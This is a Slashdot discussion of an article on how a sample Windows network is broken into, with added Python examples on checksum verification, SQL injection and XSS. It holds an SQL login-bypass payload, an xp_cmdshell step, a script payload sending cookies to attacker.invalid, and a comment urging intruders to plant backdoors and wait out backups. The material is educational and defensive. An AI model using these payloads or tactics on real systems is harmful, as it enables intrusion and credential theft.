Anatomy of a Hack
Tiberius_Fel writes "Informit.com is running an extensive article about the anatomy of a hack against a sample network. It's an excerpt from a book titled Protect Your Windows Network: From Perimeter to Data. Even though it makes references to Windows, the techniques can be applied to other operating systems fairly easily." From the article: "Although attacking networks can be fun and informative--not to mention illegal if you do not have all the proper permissions--the fact remains that the vast majority of us do not need to know how to do so. Frankly, becoming a good penetration tester (pen tester) takes more than a week-long class. It takes commitment, dedication, intuition, and technical savvy, not to mention a blatant disregard for the rules and the right way to do things."
How to protect your Windows Network (Score:4, Funny)
Re:How to protect your Windows Network (Score:1)
Oh noes!! (Score:5, Funny)
For Some, it just isn't worth it. (Score:5, Insightful)
But that's what America is for. They need something, but don't have the time to do it. So you learn how to provide for their need, and sell it to them.
Re:For Some, it just isn't worth it. (Score:2, Informative)
While working for a Fortune 500 company that will remain anonymous, I "handled" security and disaster recovery for the Unix team. After September 11th I had a new title, was flying to the SunGard site in Philly every 3 months for testing, and had close to an unlimited budget to make sure we were safe from hackers and terrorists, could handle a major disaster, etc.
It's very unfortunate that companies don't see the need for security and disaster recovery (which by the way go hand in
Re:For Some, it just isn't worth it. (Score:4, Interesting)
Using the few thousand business and government networks I've seen over many years, about 99% of them could be cracked very quickly by anyone with half a clue. What's more, in the majority of cases, the technical people involved (either in-house or consultants) pretty much all knew that.
It may take more than a week to become a good pen tester because that involves a more comprehensive look at finding ALL the vulnerabilities and providing priorities and instructions on fixing them, but it sure doesn't take that long to learn enough to crack most network security.
The most common network used to be completely un-hardened hosts running multiple insecure applications on unsegmented networks with multiple unmonitored internet connections.
About the only improvement in the "average" network nowadays is that a firewall or at least NAT device is generally found on the internet facing edges of that insecure network and not much more.
Sure, I've worked for large ecommerce companies where we had better security than most banks (at least according to our regular third-party security auditors), but the vast majority of networks out there are either small to medium businesses run by managers with no clue and less inclination to spend money on security, or large companies and government agencies where no one knows what's going on enough to close all the gaps.
Especially government agencies. A friend worked as a security consultant for a cabinet level agency that ran for years with all the firewalls in simple routing mode because one of the high level bureaucrats decided it simplified things (you know, no pesky security in the way) and their IDS would be good enough security by itself. If you've seen most government contracted IDS, you know how much of a joke that is.
It's routine at some of the agencies I did consulting work for to have all the employees in the office using the same username and password. Of course, the password being "password" made it easy for them all to remember and happy to give it out to any outsider who they thought might need it.
Just this last saturday I listened to someone in the park on their mobile phone tell their customer that their company email password was "password" so that the customer could check their email for a document they wanted.
Now with widespread unsecured wireless network use showing up all over the place..... ahhhh... the lack of security is too much to contemplate! At least you used to have to be able to somewhat guess an IP range if you wanted to target a specific office. Now people can generally just park nearby and watch all the packets go past.
hey beavis! (Score:5, Funny)
Re:hey beavis! (Score:1)
Already Slashdotted, but I'm mirroring it here: (Score:1, Informative)
Re:Already Slashdotted, but I'm mirroring it here: (Score:1)
Re:Already Slashdotted, but I'm mirroring it here: (Score:2)
Re:Already Slashdotted, but I'm mirroring it here: (Score:3, Informative)
Please don't download any of the MP3 files you find there.
Note to Newbies, On the whole don't trust any mirror you find on slashdot that's not somebody like Mirrordot, Google, or the like. You may find yourself at goatse . cx
CYA (Score:2, Interesting)
Re:Performance Anxiety (Score:4, Funny)
favorite program for network security testing (Score:2, Insightful)
Re:favorite program for network security testing (Score:1)
They did not use any vulnerabilities, certainly not anything that an outside scan by nessus would have picked up.
Jason
Raising the bar (Score:5, Informative)
A lot of people will post on this story about how weak Windows is, or how great OpenBSD is, or whatever.
The keys to secure computing are
The use of multiple layers is crucial. Never depend on just a firewall, encrypted transmissions, or just on password protection. Never depend on your vendor to secure your data - it's your data, not your vendor's. Read your EULA, and you'll note how little they care.
Re:Raising the bar (Score:3, Insightful)
Also remember that social engineering can be used to penetrate networks.
Re:Raising the bar (Score:1)
4. Not having stupid users
Re:Raising the bar (Score:1)
Make sure whatever users that have a potential to be stupid can't screw up the entire system.
Re:Raising the bar (Score:2)
Re:Raising the bar (Score:2)
Re:Raising the bar (Score:2)
For each potential attacker class, and for every attack vector open to that class.
Some avenues of attack are more expensive or more difficult than others, and that depends on the class the attacker fits. Governments can do things that script kiddeez can't afford, while script kiddeez (for example) don't have to get a court order to try.
Also, it's not necessary for attackers to know a priori that compromising your systems will b
Difference between hacking and cracking... (Score:5, Insightful)
Re:Difference between hacking and cracking... (Score:1)
Hey, these are
we lost that battle in the mainstream media... (Score:1)
Re:Difference between hacking and cracking... (Score:3, Interesting)
To crack a system, one needs to find a hole the developers missed, without access to source. This can take insight and engineering skills on par with the designers, if misapplied. This is why so many hunt for vulnerabilities and then release security notices, leaving it to the kiddies to craft the crack.
In the virus world, the same applies. The SQL injection worm was an awesomely crafted HTTP packet,
Re:Difference between hacking and cracking... (Score:1)
Or in many cases that I've seen, one only has to find a hole that the developers _hoped_ everyone would miss..
Re:Difference between hacking and cracking... (Score:2, Interesting)
Re:Difference between hacking and cracking... (Score:2)
At least that is what "cracking" used to mean before ESR thought he could use it as substitute for "breaking into computer systems".
Oversimplification. (Score:2)
ACs.... (Score:1)
Just like the movie Face Off (Score:2)
Re:Just like the movie Face Off (Score:1)
Error parsing construct.. (Score:2, Flamebait)
Who in his fucking right mind would put Windows boxes at the edge of his network?! If you must use it, at least use a proper OS for babysitting.
Re:Error parsing construct.. (Score:3, Interesting)
<sigh>
You may not have R'd TFA, but if you had, you'd notice that the techniques they illustrate to gain increasing and ultimately complete access to the network aren't particularly Windows-centric. The attack starts with a SQL injection vulnerability, for example, which is just as possible on a fully patched LAMP box if it's carelessly set up. The tools and specifics might be different on another system, but don't kid yourself that running non-MS machines at the edge of your networks is some kind o
Error parsing "panacea" (Score:3, Informative)
Network security in general, like another poster already commented, is about risk management. You'll NEVER be 100% secure - this doesn't mean that OS with the worst security track record in history is good enough. The idea is to get yourself to a comfortable level of paranoia vs functionality.
After watching Code Red, Blaster, Slammer, Sasser, etc, etc, etc run
It's the administrator you want, not Microsoft (Score:2)
The thing is, I think you guys are confusing "Windows machine" with "naively configured machine". I'll concede in advance that there is a high correlation. ;-)
You seem to be extrapolating from the fact that Sasser and friends were a widespread pain in the ass that Windows sucks. The latter may be true, but the former doesn't imply it. I got the feeling (just from reading the reports at the time, nothing fancy) that those worms mostly spread through stupidly configured home-user systems, not professionally
Windows networks (Score:1)
Article has a good page on cleaning systems (Score:5, Interesting)
What he doesn't really go into is how to build your production systems in a way that *ASSUMES* you're going to get attacked, maintains a clean environment for developing them in, and gives you the tools to rebuild rapidly from trustable versions. On the other hand, he does show how his example's victim's system was thoroughly broken into, getting from the production system to the development system, because it really *is* hard to do a good job of separating them adequately in a real environment, so even if you think you have a clean-room, you might not.
Re:Article has a good page on cleaning systems (Score:3, Informative)
All of my backups end in
Ah, simplicity of well thought out security. (Concerning backups, anyways.)
Shameless plug follows
A bit ago, I accidentally nuked my home dir, so I made myself a backup script that scans $HOME for ".nobackup" files, and then archives everything but those directories containing those (I really don't need three copies of the kernel source in my backups, you know?).
Re:Article has a good page on cleaning systems (Score:5, Insightful)
If you were a hacker, and had just broken into someone's computer/network, would you start playing around and messing things up as soon as you got in?
Hell no. Only a moron would do that. You would (very quietly) install another backdoor or two, to make sure you can still get in, and then you'd wait five or six months, maybe a year or so, and ~then~ start causing trouble.
If you start making a mess right away, there's a good chance you'll get detected, and they'll do something about it to lock you out, maybe even going back to those backups and restoring them. That's no good.
On the other hand, if you wait, then by the time you start causing noticeable damage, they've already made new backups several times. With your exploits already in them. So they can restore the backups, and you can log right back in. The only way to get uncompromised backups will be to use very old ones, from before you got in in the first place.
Patience is a virtue, in hacking just as in everything else.
Re:Article has a good page on cleaning systems (Score:1)
Look up , yeah right now..... that plane you see up there is carrying the point you missed !
How do you _know_ that the files weren't compromised before you zipped and encrypted them ?
Still think that's well thought out security ?
Re:Article has a good page on cleaning systems (Score:2)
I keep backups for a year and a half.
You know, minimum.
You can with Debian. (Score:3, Interesting)
Then you can mount the infected drive and validate the checksums against the packages available on the web.
This will not tell you anything about your data, but none of your data should be executable anyway, right?
The same goes for Red Hat or any other distribution that has checksums for both packages and files contained within those packages.
You can even completely re-install the kernel on a Debian system in this fashi
That's only a beginning. (Score:3, Interesting)
Actually, it will. (Score:2)
Yep. And those are the ones that would be replaced by a rootkit.
It doesn't have to. Those should be easy to check manually.
You DO know what accounts are necessary on your systems, right?
Why would there be any apps i
Re:Actually, it will. (Score:2)
And where are the package content checksums kept? That's right, on your compromised system. I'm not even sure Debian mandates MD5 checksums on all its package files yet.
Also there are more than
No assumptions necessary. (Score:2)
No. They're on the web site of the distribution that you used.
You compare the checksum of the package on your system with the checksum listed on the website.
You DO know what a checksum is, right?
Mandates or not, they are there.
Re:No assumptions necessary. (Score:2)
Let's stick to Debian instead of pretending that all distributions are the same (although, AFAIK, no distribution allows what you claim they all do).
So, with Debian, you can boot into Knoppix. There is no general tool to say "I'm booted into Knoppix, please verify /mnt/foo which is a Debian installation with website bar using gpg key XYZ".
So, what can you do ... you can have a trusted version of debsig-verify, and a trusted version o
I'm a sysadmin. I rock. (Score:2)
Unlike certain Windows-centric individuals, I am not limited by the presence or absence of a tool specifically written to perform a function. I can script my own.
That is because I rock.
Attend, Grasshopper, and I will provide you illumination upon your path to True SysAdmin-hood.
Argue for your limitations, and the
Re:No assumptions necessary. (Score:2)
Actual production systems are typically much more complex than a raw Debian installation. It takes a *lot* of discipline to run a good configuration management environment at all, something that far too many companies with web sites don't do well, much less to run it in a way that gives you a trusted base for every application on your system.
You're probably not just going to have raw Debian and some data files. There'll be databases (typically O
Actually, there is. (Score:2)
Sure there is. When I say 2+2=4 and someone else is saying it's 6, then condescending is spot on.
No, they are not.
They have the same BASIC system and then they have whatever specifics needed for that app.
If I can validate everything except that app, then it is just a matter of re-installing that app. And that is the issue.
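The verification the subthread above is arguing about (boot clean, mount the suspect disk, compare every packaged file against checksums that did NOT come from that disk) in working form. This is an added example, not code from the article, from Debian or from any poster here: the file names, the "clean" contents, the tampered ps and the dropped binary are all constructed, and the manifest is built from those constructed contents in place of the distribution's signed package checksums, which is where a real run would get it.

```python
"""Added example (not from the article or the thread): verify a mounted,
suspect root filesystem against a checksum manifest obtained out of band.
Everything under CLEAN_FILES and build_suspect_root() is constructed."""
import hashlib
import os
import tempfile
from pathlib import Path

# Constructed stand-ins for the distribution's own files. A real manifest would
# be the vendor's package checksums, fetched from the vendor and signature-
# checked on the clean boot medium, never read off the suspect disk.
CLEAN_FILES = {
    "bin/ls": b"#!/bin/sh\nexec /usr/bin/real-ls \"$@\"\n",
    "bin/ps": b"#!/bin/sh\nexec /usr/bin/real-ps \"$@\"\n",
    "lib/libc.so.6": b"\x7fELF clean build",
}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest() -> str:
    """Trusted manifest in sha256sum(1) layout: '<hex>  <relative path>'."""
    return "\n".join(
        f"{hashlib.sha256(data).hexdigest()}  {rel}" for rel, data in CLEAN_FILES.items()
    )


def parse_manifest(text: str) -> dict:
    manifest = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, rel = line.partition("  ")
        manifest[rel] = digest.lower()
    return manifest


def build_suspect_root() -> Path:
    """Constructed compromised disk as it would look mounted read-only under a
    clean boot: ps trojaned to hide a process, libc removed, a binary dropped
    into a hidden directory that no package owns."""
    on_disk = dict(CLEAN_FILES)
    on_disk["bin/ps"] = b"#!/bin/sh\n/usr/bin/real-ps \"$@\" | grep -v rootkitd\n"
    del on_disk["lib/libc.so.6"]
    on_disk["usr/lib/.x/rootkitd"] = b"\x7fELF not in any package"
    root = Path(tempfile.mkdtemp(prefix="suspect-root-"))
    for rel, data in on_disk.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)
    return root


def verify_tree(mount_root: Path, manifest: dict) -> dict:
    """Only the trusted manifest decides what should be on the disk. Files on
    the disk that the manifest does not know about are reported too: that is
    where a dropped backdoor lands, and it is invisible to a check that only
    walks the manifest."""
    report = {"ok": [], "modified": [], "missing": [], "unexpected": []}
    for rel, expected in manifest.items():
        p = mount_root / rel
        if not p.is_file():
            report["missing"].append(rel)
        elif sha256_file(p) == expected:
            report["ok"].append(rel)
        else:
            report["modified"].append(rel)
    for dirpath, _, filenames in os.walk(mount_root):
        for name in filenames:
            rel = Path(dirpath, name).relative_to(mount_root).as_posix()
            if rel not in manifest:
                report["unexpected"].append(rel)
    for key in report:
        report[key].sort()
    return report


if __name__ == "__main__":
    root = build_suspect_root()
    for status, files in verify_tree(root, parse_manifest(build_manifest())).items():
        print(f"{status:10s} {files}")
```

The point the "checksums live on the compromised box" reply makes is handled by construction: verify_tree() never opens the suspect disk's own package database, and the same code works whether the disk is mounted from a live CD or hung off a clean machine as a second drive. What it cannot tell you, as another reply notes, is anything about your data, your databases or any locally built application, since none of that is in a vendor manifest.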
Glad they told me it was immoral to (cr|h)ack... (Score:2, Interesting)
I wouldn't have figured that out without them. From what I understand, laws describe what is legal, and individuals decide what is moral. Then again, maybe psychopaths need to be told...
Correction: (Score:1)
But yes, voluntary "pen testing" is probably often helpful. perhaps crackers could masquerade as white hats (company's POV, hactivists go under crackers in this example) if something screws up... but often companies won't even patch holes when they are pointed out (sorry, no source).
Old, old news... (Score:3, Informative)
http://www.microsoft.com/technet/technetmag/issue
Anatomy of a Hack... (Score:2, Funny)
No new news here (Score:5, Informative)
1. Do a WHOIS lookup of the IP range the network is on.
2. Search newsgroups for previous network internals that the SA has posted somewhere.
3. Do a port scan and fingerprint.
4. If there is a vulnerable service running, use a common exploit.
5. A quick description of how sql injection attack works on a web-application login.
6. Use xp_cmdshell on MS-SQL to download remote shell code via tftp.
7. Once someone has the sql server under control, use the poorly configured internal network to become domain admin.
Someone needs to put together a description on how a "social engineering" penetration test should be done objectively. If there is one out there please let me know. =P
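Step 5 of the summary above, the login form that hands the attacker a session, as working code. This is an added example and not the article's sample application: the user table, the credentials and the payload are constructed here, and SQLite stands in for MS SQL so it runs anywhere.

```python
"""Added example (not from the article or the thread): the login query built
by string concatenation that SQL injection exploits, next to the same check
with bound parameters. Table contents and payload are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the web application's user table (constructed).
    Plaintext passwords are a second defect; kept here to match the login
    form's one-query check."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str):
    """Form fields pasted into the SQL text: whatever the user types becomes
    part of the statement. Returns the matched username, or None."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db: sqlite3.Connection, username: str, password: str):
    """Same logic with bound parameters: the input is data, never SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def bypass_payload() -> str:
    """Closes the quoted username, makes the WHERE clause always true, and
    comments out the password comparison that follows."""
    return "' OR 1=1 --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bad password:", login_vulnerable(db, "alice", "nope"))
    print("vulnerable, payload:     ", login_vulnerable(db, bypass_payload(), ""))
    print("safe, payload:           ", login_safe(db, bypass_payload(), ""))
```

The query the vulnerable version actually runs with the payload is `SELECT username FROM users WHERE username = '' OR 1=1 --' AND password = ''`, which matches every row and logs the attacker in as the first one. Step 6 of the summary needs one more property that SQLite's execute() does not give you: MS SQL accepts stacked statements, so the same hole also takes `'; EXEC xp_cmdshell '...' --`, which is how the article gets from a login form to a shell on the database server.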
Re:No new news here (Score:1, Insightful)
2. Connect with VPN/dialup access.
3. Exploit local root hole
Simple!
Re:No new news here (Score:3, Informative)
Just finished the book, well worth the fairly short read. All non-true stories but are based in a realistic setting. Gets mi
Re:No new news here (Score:1)
Kevin Mitnick [mitnicksecurity.com] has written some interesting books that cover social engineering attacks extensively. More info here [amazon.com] and here [amazon.com]. They are a must read for anyone working in security.
Sad to see (Score:5, Insightful)
I though it was supposed to be a hacker forum
Ah so, Jedis do build their own light sabers (Score:2, Funny)
Ah so, it is true then, Jedis do build their own light sabers. [howstuffworks.com]
Disclaimer: I've seen this link on
strange definitions of warez, xss, etc. (Score:5, Interesting)
The methodology used is not extraordinary: setting up a purposely insecure network then hacking (sic) it themselves using the known holes is kind of cheesy. It helps to show how it works, but I prefer the honeynet approach: setting up boxes with known (or not) security holes, then analysing how a real intruder creates havoc.
Then there's some strange (re)definition of words.
For example, straight from TFA:
There are several techniques for getting our tools (often called "warez") onto the database server.
Then, as a side note:
Warez is a hacker/attacker colloquialism. It comes from the term "software," but is now used varyingly to mean either "attack tools" or "bootlegged software." In this chapter, we use it in the former context.
I think it's the first time I see the term "warez" used to describe "attack tools" (sic). I used to live in ancient times where "warez" weren't yet called "warez", then "warez" became "warez". Now what? "warez" aren't "warez" anymore? As it changed? (then a great many online dictionaries definition should be updated btw.).
The definition of XSS is also interesting:
In Figure 2-5, we see that not only do we get logged on, but the application also displayed the fake username we sent it on the home page. This latter artifact is actually a separate type of vulnerability known as a cross-site scripting (XSS) vulnerability, where the user input is echoed directly to the screen without sanitizing it first. We will not use it in the following attack, but it is interesting to note that it is there.
This definition of XSS is wrong: it's not because we see what was typed that the input weren't sanitized (sic). And it's certainly not because we see what was entered that this could lead to code being executed on another user's computer. Moreover I find the last sentence of this paragraph misleading: We will not use it in the following attack, but it is interesting to note that it is there. Of course they're not using it: they're "hacking" the server(s), not joe random visitor's box.
Then there are quite a lot of half-truths, that can also be misleading:
A fully compromised system cannot be trusted to tell you the truth. Even virus scanners must at some level rely on the system to not lie to them. If they ask whether a particular file is present, the attacker may simply have a tool in place that lies about it.
If by "fully compromised" it means that the BIOS has been flashed and now lies about the files it reports, I then more or less agree. However such a tool is improbable (not enough room in the BIOS memory and not all BIOS can be flashed at will). So by "fully compromised" that's probably not what they meant. How would then an attacker lie when booting from a CD and running the scan from the CD? Or when hooking the compromised HD as a second HD on a clean system? It's not like everybody run their virus/trojans/rootkits scanners from the suspicious host.
Then at the end of TFLA (the 'L' stands for "Long") they explain, in a very windowish style, how to recover from a "hack": reinstall everything, because there's nothing you can trust (besides Windows's installation medium?)
So is it about the anatomy of a "hack" or how to recover from a "hack"? Both? Then why not a single word about how to configure an IDS?
Speaking of IDS, from TFA: Once we took over an entire network through an intrusion detection system.
WTF? I'm not sure if by their definition Snort qualifies as an IDS, but I run Snort in a passive way: no IP, not a single packet emitting from the box, etc. If an IDS becomes an entry point for intruders, then it's not an IDS but an IAS: Intrusion Automation System
The article could be summarized like this (like others already pointed out i
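The "echoed username" page the post above argues about, rendered both ways. This is an added example, not the article's application: the page markup and the two payloads are constructed. It shows what distinguishes "we see what was typed" from "the input was not sanitized": the escaped page still displays the submitted name character for character, but the browser never gets to parse it as markup.

```python
"""Added example (not from the article or the thread): the post-login home
page that displays the submitted username, once with the input dropped into
the markup raw and once escaped. Markup and payloads are constructed."""
import html

# Constructed payloads: one aimed at a text node, one at an attribute value.
PAYLOAD_TEXT = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'
PAYLOAD_ATTR = '" onmouseover="alert(1)'


def home_page_vulnerable(username: str) -> str:
    """Input placed straight into a text node and into an attribute value."""
    return (
        f"<h1>Welcome, {username}</h1>\n"
        f'<input name="user" value="{username}">'
    )


def home_page_escaped(username: str) -> str:
    """html.escape(quote=True) turns <, >, &, \" and ' into entities, so the
    page still shows exactly what was typed but nothing is live markup.
    quote=True matters for the attribute context: without it a stray \" would
    still close the value attribute."""
    safe = html.escape(username, quote=True)
    return (
        f"<h1>Welcome, {safe}</h1>\n"
        f'<input name="user" value="{safe}">'
    )


def displayed_name(page: str) -> str:
    """What a user would see in the heading after the browser decodes it."""
    start = page.index("<h1>Welcome, ") + len("<h1>Welcome, ")
    end = page.index("</h1>", start)
    return html.unescape(page[start:end])


def payload_survives(page: str, payload: str) -> bool:
    """Crude XSS check: is the payload present byte for byte in the output?
    Seeing your name on the page proves nothing; this is the question."""
    return payload in page


if __name__ == "__main__":
    for name in ("alice", PAYLOAD_TEXT, PAYLOAD_ATTR):
        for label, render in (("raw", home_page_vulnerable), ("escaped", home_page_escaped)):
            page = render(name)
            print(f"{label:8s} shows={displayed_name(page)!r} live={payload_survives(page, name)}")
```

Both renderings display the same text for a normal name and for the script payload, which is the poster's point: visibility of the input is not the test. The test is whether the payload survives into the response unchanged, and in the escaped page it does not.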
the key: how stuff works... (Score:2)
understanding something completely is the best way to break it, compromise it, protect it. you must also have some creativity and/or intuition.
just some thoughts.
eric
rootkit implied by "fully compromised system" (Score:2)
Re:strange definitions of warez, xss, etc. (Score:3, Insightful)
Remember, though, that by even knowing that the topic of security exists, you're ahead of 80% of the crowd. Firewall? 90%. What are ports and sockets? 95%. SQL Injection? Cross-site scripting? Packet rebuilding with Scapy? Memory manipulation? Bus mastering? Whoa.
If anything, I have noticed m
Re:strange definitions of warez, xss, etc. (Score:1)
WTF? I'm not sure if by their definition Snort qualifies as an IDS, but I run Snort in a passive way: no IP, not a single packet emitting from the box, etc. If an IDS becomes an entry point for intruders, then it's not an IDS but an IAS: Intrusion Automation System
Interestingly enough, there have been vulnerabilities in Snort that actually did allow one to compromise it. Seems impossible given that Sn
Any comments on this? (Score:1)
Naturally, many other ports can be open, particularly if the target system is not a Windows system. However, these are the ones we look for in this chapter.
Wasn't windoze the OS with stupid, wide-range, unexplainably open ports? Any volunteers to slap the author senseless?
Pathetic (Score:2, Insightful)
They may as well have written an article on how to crack a system if somebody sends you the SA password... pathetic!
Relies on injection (Score:1)
PwnSauce (Score:1)